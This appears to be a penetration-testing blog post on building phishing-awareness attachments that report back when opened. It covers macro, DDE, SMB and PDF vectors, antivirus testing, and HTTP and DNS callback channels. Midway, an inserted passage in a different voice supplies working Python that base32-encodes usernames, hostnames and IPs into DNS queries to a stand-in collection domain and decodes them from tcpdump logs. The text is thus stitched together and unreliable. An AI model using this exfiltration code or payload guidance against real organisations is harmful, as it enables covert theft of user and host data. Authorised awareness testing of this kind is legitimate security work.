Spear phishing: experience creating conditionally malicious executable files for phishing emails


We already wrote about targeted phishing (spear phishing) in one of our articles, which covered the general aspects of targeted e-mail distribution. In this article we share our experience of preparing training (awareness) mailings that carry conditionally malicious attachments.

Typically, targeted mailings include the following steps:

  • preliminary search for employee accounts in various data sources
  • employee pre-training
  • discussion and approval with the customer of the templates of the letters to be sent
  • preparation for the mailing
  • targeted mailing to employees who have undergone training and, possibly, to employees who have not (control group)
  • collecting the mailing results into data sets
  • processing the data sets to understand the current situation
  • offering specific recommendations to the customer
  • consolidating the results and retraining employees

As part of this article, we will focus on the preparation for the targeted mailing.

If the mailing is carried out as part of a pentest or red team engagement, the search for employee accounts takes a fair amount of time and people. The resulting list of accounts is then split into target groups, and letter templates are written for each group.

Based on the specifics of the company's work and of the target group, the most plausible letter templates that employees will receive have to be drawn up. Sometimes we resort to templates announcing an "update" of some guidance document.

At this stage, you also need to choose what types of attachments in the letters we will use. In our experience, these are usually the following file types:

  • .docx, .doc
  • .xlsx, .xls
  • .exe
  • .pdf

MS Office files have the advantage that they are familiar to the user and are likely to be opened (if the spam filter does not cut them off as malicious). The downside is that there are only a few ways to launch a conditionally malicious payload from them and to establish a callback to the control server:

  • macros
  • known vulnerabilities (DDE, etc.)
  • SMB (external resources: a template or document linked into the Office file by a UNC reference, so that the client connects to our server over SMB when the file is opened)

With macros everything is relatively simple: there are automation tools for creating such macros, and they can be used with some modifications. The attachment can be ready for distribution in a few hours, or in the worst case in a few days if the antivirus that is assumed to be installed on the victim's machine flags the payload.

With SMB everything is also quite easy, and automation tools handle it; the condition, however, is that outbound SMB traffic (TCP port 445) from the user's network to the Internet is not blocked. Some companies and providers block such traffic, in which case the callback never arrives.

There are not many vulnerabilities that lead to code execution in MS Office, but keep in mind that not every company and not every workstation is able to update its office software. If we know that a particular employee of the customer has an outdated software set on the computer, we can try such vectors, hoping that the antivirus software is not updated either.

If we worked in a market where other office software is widespread, such as the Urdu InPage word processor common in Asia, we would choose the file types of that office application and use known vulnerabilities in it.

With the PDF format there are also several options for building a payload:

  • JavaScript
  • known vulnerabilities
  • SMB (external files, documents attached to the file by reference)

PDF viewer engines allow JavaScript code to be included inside a document for customization, and that code is executed on the user's computer. This method is well detected by antivirus software and therefore is not well suited to our tasks; we do not recommend it. The situation with known vulnerabilities is exactly the same: antivirus software detects the code that triggers the vulnerability well.

With SMB the situation is less rosy than in MS Office: the leak of NetNTLM hashes through such references in the most common readers, Adobe Reader and Foxit Reader, is treated as a vulnerability and has been fixed, in Adobe Reader for example in 2018 (CVE-2018-4993). Therefore, when preparing a payload in PDF form, you have to rely on other PDF viewers or on very outdated versions of the two mentioned above.

Executable files (.exe, etc.) have the advantage that the ways of communicating with the organizer of the mailing are limited only by the protocols allowed from employee computers in the company (TCP, UDP, HTTP, ICMP, etc.), and that a lot of information can be collected about the user who opens such a file. The downsides, of course, are that antivirus software may mark the distributed file as malicious, and the whole mailing can be cut off already at mail delivery by an antispam filter with an integrated antivirus engine. A further minus is that modern Windows marks a file downloaded from the Internet by writing a Mark of the Web into the Zone.Identifier alternate NTFS data stream, and when the file is launched the user is asked to confirm running the application.

Why develop our own training-mailing software?

None of the free mailing software we looked at (SpearPhisher, King Phisher, Gophish) offers automatic generation of a conditionally malicious payload in the form of an executable from a template built into the software. They leave that, so to speak, "as an exercise for the curious reader."


We approach the development of the software starting from a description of the functions it should perform.

The main function of the software is to identify the user of the target company who "swallows the bait" and launches the application, so first of all we need to decide which data the application should collect on the computer. Practice will show how complete this set is; if you think we have missed identifiers that pin a user to the target company, tell us in the comments.

For ourselves, we defined this data as follows:

  • username
  • computer name
  • external and internal IP address (where possible)

Then we determine the communication channels over which the collected data is sent back. We chose two:

  • HTTP
  • DNS

HTTP was chosen to verify that there is Internet access from the network where our software is launched. If Internet access requires no proxy or other conditions, this increases the risk of infection for the organization.

DNS was chosen as a backup channel, since companies rarely restrict access to DNS servers or the traffic that passes through DNS. Within DNS we chose A-record queries as the most likely channel for information leakage: the data travels in the queried name itself, so it is recorded at our server whether or not the query is ever answered.

Also, do not forget that antivirus software or a HIPS may be installed on the target computer, and this leaves its mark on development. A step for testing detection of the software by popular antivirus engines has to be added to the development cycle. For ourselves we set the minimum test at one engine, Windows Defender, since it ships in Windows 10 by default.

To collect the data arriving over the DNS channel we configured records at our domain's registrar. The essence of the configuration is that all queries for subdomains of our domain are delegated (an NS record, plus an A record for the name server host) to our own name server, where we simply run tcpdump on port 53. This is the minimum effort needed to record the data sent by our application.

Interesting points on the way to release

It turned out that non-ASCII characters must not be put into the names queried over the DNS channel: usernames or computer names written in Cyrillic, Farsi, etc. turn into garbage 🙂 We settled on base32 encoding, since every character of its alphabet is valid in a DNS label and the alphabet is case-insensitive, so a resolver that folds or randomizes the case of a name cannot corrupt the data. While looking at existing solutions we saw that base64 is also accepted by most modern DNS servers, but its alphabet contains "+", "/" and "=" and is case-sensitive, so it is the riskier choice. Also, a single label may hold at most 63 characters and the whole name at most 253, so longer data must be split into several labels or several queries. A username or computer name longer than 63 characters is rare, but if you later want to exfiltrate more data than we listed in the wishes for the program, this limit has to be taken into account.
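As an added example of the two passages above (the tcpdump collection point on our name server and the base32 / 63-character label rules), here is the client-side encoding and the server-side decoding for the DNS channel. This is our illustration, not code from the post or its authors: the domain collect.example.net, the "|" field separator, the function names and the tcpdump sample lines are assumptions of the example.

```python
import base64
import re

# Assumed collection domain delegated to our own name server; the domain used
# in the post is not given. All names below are ours, not the post's.
COLLECT_DOMAIN = "collect.example.net"
MAX_LABEL = 63   # RFC 1035: a label holds at most 63 characters
MAX_NAME = 253   # a full name in text form holds at most 253 characters


def encode_beacon(username: str, hostname: str, internal_ip: str) -> str:
    """Pack the collected fields into one A-query name under COLLECT_DOMAIN.

    The fields are joined with '|' (Windows forbids it in user and computer
    names, and it is outside the base32 alphabet), base32-encoded so that
    Cyrillic or Farsi names survive and so that a resolver folding or
    randomizing the case of the name cannot corrupt the data, and cut into
    labels of at most 63 characters. The '=' padding is dropped because it is
    not a valid label character; the decoder restores it.
    """
    raw = "|".join((username, hostname, internal_ip)).encode("utf-8")
    b32 = base64.b32encode(raw).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    name = ".".join(labels + [COLLECT_DOMAIN])
    if len(name) > MAX_NAME:
        # A larger payload would have to be spread over several queries, each
        # carrying a sequence number; the three fields above never need that.
        raise ValueError(f"payload needs {len(name)} characters, limit is {MAX_NAME}")
    return name


def decode_beacon(name: str) -> tuple:
    """Reverse encode_beacon on a name seen in the query log of our server."""
    suffix = "." + COLLECT_DOMAIN
    if not name.lower().endswith(suffix):
        raise ValueError("query is not for the collection domain")
    b32 = name[:-len(suffix)].replace(".", "").upper()
    b32 += "=" * (-len(b32) % 8)          # restore the stripped base32 padding
    raw = base64.b32decode(b32).decode("utf-8")
    username, hostname, internal_ip = raw.split("|", 2)
    return username, hostname, internal_ip


# "tcpdump -n udp port 53" prints an A query as "... 4242+ A? name. (len)".
# Only A-type queries match; AAAA and other types are skipped.
_TCPDUMP_A_QUERY = re.compile(r"\sA\? (\S+?)\.? \(\d+\)")


def queries_from_tcpdump(text: str) -> list:
    """Extract the names of A queries from tcpdump text output."""
    return [m.group(1) for m in _TCPDUMP_A_QUERY.finditer(text)]


def reports_from_tcpdump(text: str) -> list:
    """Decode every beacon in a capture; unrelated or corrupted names are dropped."""
    reports = []
    for name in queries_from_tcpdump(text):
        try:
            reports.append(decode_beacon(name))
        except ValueError:      # other domain, bad base32, bad UTF-8, missing fields
            continue
    return reports


# Constructed sample of what tcpdump on our name server could print: two
# launches (one with Cyrillic names), an AAAA query and an unrelated A query.
SAMPLE_TCPDUMP = "\n".join([
    "09:12:03.118233 IP 203.0.113.8.51234 > 198.51.100.7.53: 4242+ A? "
    + encode_beacon("ivanov", "WS-1234", "10.1.2.3") + ". (119)",
    "09:12:03.220011 IP 203.0.113.8.51235 > 198.51.100.7.53: 4243+ AAAA? "
    + "www.example.com. (33)",
    "09:15:41.003877 IP 203.0.113.9.49877 > 198.51.100.7.53: 7001+ A? "
    + encode_beacon("иванов", "БУХ-01", "10.1.2.7") + ". (131)",
    "09:16:02.500000 IP 203.0.113.10.50001 > 198.51.100.7.53: 8008+ A? "
    + "www.example.org. (33)",
])

if __name__ == "__main__":
    for report in reports_from_tcpdump(SAMPLE_TCPDUMP):
        print(report)
```

Running the block prints the two decoded reports. Because every query name is unique, a recursive resolver cannot answer it from cache and forwards it to our name server; a resolver that refuses to forward (DNS filtering) simply produces nothing, which is one more reason to keep HTTP as the primary channel.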

To determine the external IP address one has to rely either on third-party resources we do not control, which affects the quality of the collected results if such a resource is blocked in the target company or region, or on our own resources. Therefore, by agreement with the customer, either external hosts known not to be blocked in the organization's network should be used for exfiltration, or services hosted in networks that are unlikely to be blocked (Azure, Amazon, DigitalOcean), relying on luck.

Since the target computer may have several internal addresses, we decided to take only the first one in the list. This assumption rests on the fact that the phishing funnel will most likely pass through an ordinary employee with an ordinary computer that has a single network address.


After the payload was launched on target hosts, we first received requests from an ASN owned by Microsoft in France; after a while, reports of our application being launched started arriving from the ASNs of Asian countries: Korea, China, India. This confirmed once again that modern anti-virus and anti-phishing solutions upload files they consider suspicious to their cloud and run them on their own virtual machines to decide whether the files are harmful.

The identifiers of the virtual machines from the Microsoft cloud are all alike: an arbitrary computer name and the same username. The computer identifiers from Asia, on the other hand, look like real user data (Computer, Admin-PC, USERPC, etc.). This may mean either that our files were opened from a location hidden behind a VPN, or that anti-virus companies share fresh samples with each other.

Since we created non-personalized application builds, it was impossible to track which specific files were sent to the cloud: maybe all the files from the mailing, maybe only those sent first. In future releases we will most likely add a patching mechanism for each attachment, so that the application sent to a user carries the ID of the addressee of the letter; this makes it easier to track which files are checked on cloud virtual machines and is needed to discard false positives in the data received by the collection server.


The success of phishing attacks is helped by a low level of user awareness of the rules for working with mail in the company. Spam filters remain the main protection against mass phishing, but they do not save you from spear phishing (targeted phishing).

In my opinion, one should not discount the importance of social engineering in the context of penetration testing. The human factor will always be a loophole for cybercriminals in the security system of even the largest company. If even a small percentage of employees launch malware on the organization's network (especially privileged employees: top management, system administrators), it means a compromise of the whole company.
